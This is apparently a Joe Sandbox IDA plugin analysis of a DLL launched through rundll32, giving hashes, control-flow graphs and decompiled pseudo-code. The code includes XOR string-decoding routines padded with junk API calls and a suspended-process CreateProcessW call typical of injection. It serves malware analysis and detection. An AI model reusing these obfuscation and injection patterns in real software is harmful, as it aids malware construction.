                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2567405617-0
                                                                                                                                                                                                                                                                            • Opcode ID: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
                                                                                                                                                                                                                                                                            • Instruction ID: 9a7a69b10fe3764d9cd2296672b65be2c5230f9efb3b633d2ad7adf520ad261b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6017C7660022ABFBB20EBA5DD89DCF7FAEEB456E17210426F905D2111EA71DD40C6B0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 356 10009d63-10009d78 357 10009d7a-10009d8b 356->357 358 10009d9e-10009dbc GetNumberFormatA 356->358 361 10009d97-10009d9c 357->361 362 10009d8d-10009d90 357->362 359 10009dc8 358->359 360 10009dbe 358->360 364 10009dca-10009dce 359->364 363 10009dc0-10009dc4 360->363 361->358 362->357 365 10009d92-10009d95 362->365 363->363 366 10009dc6 363->366 364->364 367 10009dd0-10009de2 call 100091e7 364->367 365->358 366->367 370 10009de4-10009de9 367->370 371 10009deb-10009ded 367->371 372 10009e0f-10009e13 370->372 373 10009e0d 371->373 374 10009def-10009e0b 371->374 373->372 374->373 374->374
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E10009D63(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v88;
                                                                                                                                                                                                                                                                            				int _t19;
                                                                                                                                                                                                                                                                            				struct _numberfmt* _t29;
                                                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                                                            				struct _numberfmt* _t36;
                                                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                                                            				struct _numberfmt* _t44;
                                                                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t41 = __edx;
                                                                                                                                                                                                                                                                            				_t45 = _a12;
                                                                                                                                                                                                                                                                            				_t44 = 0;
                                                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                                                            				_t33 = 0;
                                                                                                                                                                                                                                                                            				if(_t45 >= __edx) {
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
                                                                                                                                                                                                                                                                            					if(_t19 != 0) {
                                                                                                                                                                                                                                                                            						_t36 = _t44;
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							_t36 = _t36 + 1;
                                                                                                                                                                                                                                                                            						} while (_t36 < 0x22);
                                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                                            						_t38 = E100091E7(2 + _t33 * 2);
                                                                                                                                                                                                                                                                            						if(_t38 != 0) {
                                                                                                                                                                                                                                                                            							if(_t33 == 0) {
                                                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                                                            								return _t38;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                                                            								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
                                                                                                                                                                                                                                                                            								_t44 = _t44 + 1;
                                                                                                                                                                                                                                                                            								_t45 = _t45 + 1;
                                                                                                                                                                                                                                                                            							} while (_t44 < _t33);
                                                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return 0x100210ac;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t29 = _t44;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t29 = _t29 + 1;
                                                                                                                                                                                                                                                                            					} while (_t29 < 0x14);
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
                                                                                                                                                                                                                                                                            					_t45 = _t45 + 1;
                                                                                                                                                                                                                                                                            					if(_t45 < _t41) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t45 = _a12;
                                                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t34 = _t45;
                                                                                                                                                                                                                                                                            				_t45 = _a12;
                                                                                                                                                                                                                                                                            				_t33 = _t34 - _t45;
                                                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x10009d63
                                                                                                                                                                                                                                                                            0x10009d6b
                                                                                                                                                                                                                                                                            0x10009d6f
                                                                                                                                                                                                                                                                            0x10009d71
                                                                                                                                                                                                                                                                            0x10009d74
                                                                                                                                                                                                                                                                            0x10009d78
                                                                                                                                                                                                                                                                            0x10009d9e
                                                                                                                                                                                                                                                                            0x10009db4
                                                                                                                                                                                                                                                                            0x10009dbc
                                                                                                                                                                                                                                                                            0x10009dc8
                                                                                                                                                                                                                                                                            0x10009dca
                                                                                                                                                                                                                                                                            0x10009dca
                                                                                                                                                                                                                                                                            0x10009dcb
                                                                                                                                                                                                                                                                            0x10009dd0
                                                                                                                                                                                                                                                                            0x10009dde
                                                                                                                                                                                                                                                                            0x10009de2
                                                                                                                                                                                                                                                                            0x10009ded
                                                                                                                                                                                                                                                                            0x10009e0d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009def
                                                                                                                                                                                                                                                                            0x10009def
                                                                                                                                                                                                                                                                            0x10009e03
                                                                                                                                                                                                                                                                            0x10009e07
                                                                                                                                                                                                                                                                            0x10009e08
                                                                                                                                                                                                                                                                            0x10009e09
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009def
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009de4
                                                                                                                                                                                                                                                                            0x10009dbe
                                                                                                                                                                                                                                                                            0x10009dc0
                                                                                                                                                                                                                                                                            0x10009dc0
                                                                                                                                                                                                                                                                            0x10009dc1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009dc6
                                                                                                                                                                                                                                                                            0x10009d7a
                                                                                                                                                                                                                                                                            0x10009d8d
                                                                                                                                                                                                                                                                            0x10009d90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d92
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d92
                                                                                                                                                                                                                                                                            0x10009d97
                                                                                                                                                                                                                                                                            0x10009d99
                                                                                                                                                                                                                                                                            0x10009d9c
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FormatNumber
                                                                                                                                                                                                                                                                            • String ID: electricmadness
                                                                                                                                                                                                                                                                            • API String ID: 481257995-1127315026
                                                                                                                                                                                                                                                                            • Opcode ID: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
                                                                                                                                                                                                                                                                            • Instruction ID: aab1a026c2f2c5a5b26f8d8130129cea483a76aafec3bdca2fedd0ee807baeb0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92117F327043955BEB10EF98CC856AE37A5DF852D0B51406AFD92DB259D670EC42C390
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 375 10009cbf-10009cd2 376 10009cd4 375->376 377 10009ce9-10009d09 GetNumberFormatA 375->377 380 10009cd7-10009ce2 376->380 378 10009d51-10009d55 377->378 379 10009d0b-10009d0f 377->379 378->378 384 10009d57 378->384 379->379 383 10009d11 379->383 381 10009d13-10009d15 380->381 382 10009ce4-10009ce7 380->382 381->377 385 10009d17-10009d1b call 100091e7 381->385 382->377 382->380 383->384 386 10009d5c 384->386 389 10009d20-10009d28 385->389 388 10009d5e-10009d62 386->388 390 10009d31-10009d36 389->390 391 10009d2a-10009d2f 389->391 392 10009d38-10009d4a 390->392 391->388 392->392 393 10009d4c-10009d4f 392->393 393->386
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E10009CBF(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v88;
                                                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                                                            				struct _numberfmt* _t27;
                                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                                                                            				_t29 = __ecx;
                                                                                                                                                                                                                                                                            				_t37 = _a12;
                                                                                                                                                                                                                                                                            				_t38 = _t37;
                                                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                                                            				if(_t37 >= __edx) {
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            					_t27 = 0;
                                                                                                                                                                                                                                                                            					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							_t27 = _t27 + 1;
                                                                                                                                                                                                                                                                            						} while (_t27 < 0x22);
                                                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                                                            						_t30 = 0x1002107e;
                                                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                                                            						return _t30;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                                                            						_t27 = _t27 + 1;
                                                                                                                                                                                                                                                                            					} while (_t27 < 0x14);
                                                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t28 = _a4;
                                                                                                                                                                                                                                                                            				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
                                                                                                                                                                                                                                                                            					_t38 = _t38 + 1;
                                                                                                                                                                                                                                                                            					if(_t38 < _t34) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t39 = _t38 - _t37;
                                                                                                                                                                                                                                                                            				if(_t39 == 0) {
                                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t21 = E100091E7(_t39 + 1); // executed
                                                                                                                                                                                                                                                                            				_t32 = _t21;
                                                                                                                                                                                                                                                                            				_a12 = _t32;
                                                                                                                                                                                                                                                                            				if(_t32 != 0) {
                                                                                                                                                                                                                                                                            					_t33 = _v8;
                                                                                                                                                                                                                                                                            					_t36 = _t32 - _t37;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
                                                                                                                                                                                                                                                                            						_t37 = _t37 + 1;
                                                                                                                                                                                                                                                                            						_t39 = _t39 - 1;
                                                                                                                                                                                                                                                                            					} while (_t39 != 0);
                                                                                                                                                                                                                                                                            					_t30 = _a12;
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 0x1002107e;
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x10009cbf
                                                                                                                                                                                                                                                                            0x10009cbf
                                                                                                                                                                                                                                                                            0x10009cc8
                                                                                                                                                                                                                                                                            0x10009ccb
                                                                                                                                                                                                                                                                            0x10009ccd
                                                                                                                                                                                                                                                                            0x10009cd2
                                                                                                                                                                                                                                                                            0x10009ce9
                                                                                                                                                                                                                                                                            0x10009cee
                                                                                                                                                                                                                                                                            0x10009d09
                                                                                                                                                                                                                                                                            0x10009d51
                                                                                                                                                                                                                                                                            0x10009d51
                                                                                                                                                                                                                                                                            0x10009d52
                                                                                                                                                                                                                                                                            0x10009d57
                                                                                                                                                                                                                                                                            0x10009d57
                                                                                                                                                                                                                                                                            0x10009d5c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d0b
                                                                                                                                                                                                                                                                            0x10009d0b
                                                                                                                                                                                                                                                                            0x10009d0b
                                                                                                                                                                                                                                                                            0x10009d0c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d11
                                                                                                                                                                                                                                                                            0x10009cd4
                                                                                                                                                                                                                                                                            0x10009cd7
                                                                                                                                                                                                                                                                            0x10009ce4
                                                                                                                                                                                                                                                                            0x10009ce7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009ce7
                                                                                                                                                                                                                                                                            0x10009d13
                                                                                                                                                                                                                                                                            0x10009d15
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d1b
                                                                                                                                                                                                                                                                            0x10009d21
                                                                                                                                                                                                                                                                            0x10009d23
                                                                                                                                                                                                                                                                            0x10009d28
                                                                                                                                                                                                                                                                            0x10009d33
                                                                                                                                                                                                                                                                            0x10009d36
                                                                                                                                                                                                                                                                            0x10009d38
                                                                                                                                                                                                                                                                            0x10009d43
                                                                                                                                                                                                                                                                            0x10009d46
                                                                                                                                                                                                                                                                            0x10009d47
                                                                                                                                                                                                                                                                            0x10009d47
                                                                                                                                                                                                                                                                            0x10009d4c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009d4c
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FormatNumber
                                                                                                                                                                                                                                                                            • String ID: chickenfried
                                                                                                                                                                                                                                                                            • API String ID: 481257995-586419266
                                                                                                                                                                                                                                                                            • Opcode ID: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
                                                                                                                                                                                                                                                                            • Instruction ID: c59e46062cbfb6ba45e4af24f1aa4b5ee3d0c5177bb5fc11745f9e327f620478
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D117D35B083955FFB10CE6C8884A9E77AADB851C0B62406BF9929B25AD530DC018350
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 394 1000cb78-1000cbc7 call 1000936a * 2 CreateProcessW
                                                                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                                                                            			E1000CB78(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOW _v72;
                                                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E1000936A(__edx, 0, 0x10);
                                                                                                                                                                                                                                                                            				E1000936A( &_v72, 0, 0x44);
                                                                                                                                                                                                                                                                            				_v72.cb = 0x44;
                                                                                                                                                                                                                                                                            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				return  ~( ~_t11) - 1;
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x1000cb89
                                                                                                                                                                                                                                                                            0x1000cb96
                                                                                                                                                                                                                                                                            0x1000cb9e
                                                                                                                                                                                                                                                                            0x1000cbba
                                                                                                                                                                                                                                                                            0x1000cbc0
                                                                                                                                                                                                                                                                            0x1000cbc7

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000CBBA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateProcessmemset
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 2296119082-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
                                                                                                                                                                                                                                                                            • Instruction ID: 07932fc84ff427775a204e18f3fe0ba77352146c5b198283cf31ed6b76e6a132
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F065F16406187FF720DA65CC0AFBF36ACDB85750F504125BB09EB1C1E5A0BE0586B5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                                                            			E10001494(void* __edi, void* __fp0) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                                                                            				char _t19;
                                                                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                                            				intOrPtr* _t36;
                                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                                                                            				char _t62;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t68 = __fp0;
                                                                                                                                                                                                                                                                            				E100015D4();
                                                                                                                                                                                                                                                                            				_t19 = E100091E7(0x20);
                                                                                                                                                                                                                                                                            				_v8 = _t19;
                                                                                                                                                                                                                                                                            				_t54 = 0x1f;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					_t2 = _t54 + 0x63; // 0x82
                                                                                                                                                                                                                                                                            					 *((char*)(_t54 + _t19)) = _t2;
                                                                                                                                                                                                                                                                            					_t54 = _t54 - 1;
                                                                                                                                                                                                                                                                            				} while (_t54 >= 0);
                                                                                                                                                                                                                                                                            				E10009203( &_v8, 0);
                                                                                                                                                                                                                                                                            				_t22 = E1000BC31(_t54, __fp0); // executed
                                                                                                                                                                                                                                                                            				 *0x10020fd8 = _t22;
                                                                                                                                                                                                                                                                            				if(_t22 != 0) {
                                                                                                                                                                                                                                                                            					E1001433B( *((intOrPtr*)(_t22 + 0x224)));
                                                                                                                                                                                                                                                                            					_t24 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            					_t60 = 1;
                                                                                                                                                                                                                                                                            					_t50 = _t58;
                                                                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
                                                                                                                                                                                                                                                                            						__imp__CoInitializeEx(0, 6, __edi);
                                                                                                                                                                                                                                                                            						_t30 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                                                            						_push(0x1001d9b8);
                                                                                                                                                                                                                                                                            						_t31 = _t30 + 0x228;
                                                                                                                                                                                                                                                                            						__eflags = _t31;
                                                                                                                                                                                                                                                                            						_push(_t31);
                                                                                                                                                                                                                                                                            						_t56 = E100099EC(0x1001d9b8);
                                                                                                                                                                                                                                                                            						_t62 = E100016EC(0x1001d9b8, 0x2a);
                                                                                                                                                                                                                                                                            						_v8 = _t62;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							_t52 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            							_t34 =  *0x10020fc0; // 0x466fa38
                                                                                                                                                                                                                                                                            							_t36 =  *0x10020fb4; // 0x466fc18
                                                                                                                                                                                                                                                                            							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
                                                                                                                                                                                                                                                                            							__eflags = _t37 - 5;
                                                                                                                                                                                                                                                                            							if(_t37 != 5) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							Sleep(0x7d0);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E10009E2E( &_v8);
                                                                                                                                                                                                                                                                            						_t40 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						_pop(_t50);
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t40 + 0xec))(0);
                                                                                                                                                                                                                                                                            						_t24 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            						_t60 = 1;
                                                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					__eflags =  *(_t24 + 0x1898) & 0x00010083;
                                                                                                                                                                                                                                                                            					if(( *(_t24 + 0x1898) & 0x00010083) != 0) {
                                                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
                                                                                                                                                                                                                                                                            						_t25 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
                                                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t14 = _t24 + 0x224; // 0x10000000
                                                                                                                                                                                                                                                                            						_t54 =  *_t14;
                                                                                                                                                                                                                                                                            						_t29 = E1000A771( *_t14); // executed
                                                                                                                                                                                                                                                                            						__eflags = _t29;
                                                                                                                                                                                                                                                                            						_t24 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            						_t50 = _t50;
                                                                                                                                                                                                                                                                            						if(_t29 == 0) {
                                                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
                                                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                                                            								__eflags = E100029DD();
                                                                                                                                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                                                                                                                                            									L15:
                                                                                                                                                                                                                                                                            									E100012F8(_t50, _t54, __eflags, _t68);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t27 = 0;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t27;
                                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                                            0x10001494
